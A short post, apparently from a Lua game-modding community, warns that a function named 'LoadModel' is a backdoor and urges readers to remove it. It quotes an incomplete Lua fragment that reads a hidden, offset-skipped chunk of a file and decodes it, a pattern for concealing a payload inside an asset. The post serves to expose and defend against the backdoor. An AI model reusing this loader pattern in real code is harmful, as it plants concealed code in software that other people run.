This is also a backdoor function you should remove it this backdoor not going to work anymore but for future safety remove it
Code:
function LoadModel(m, n, o) local p = file.Open(m, "rb", "BASE_PATH") if not p then return end p:Skip(o) local q = p:Read(p:Size() - o) p:Close() local l = d(q, n)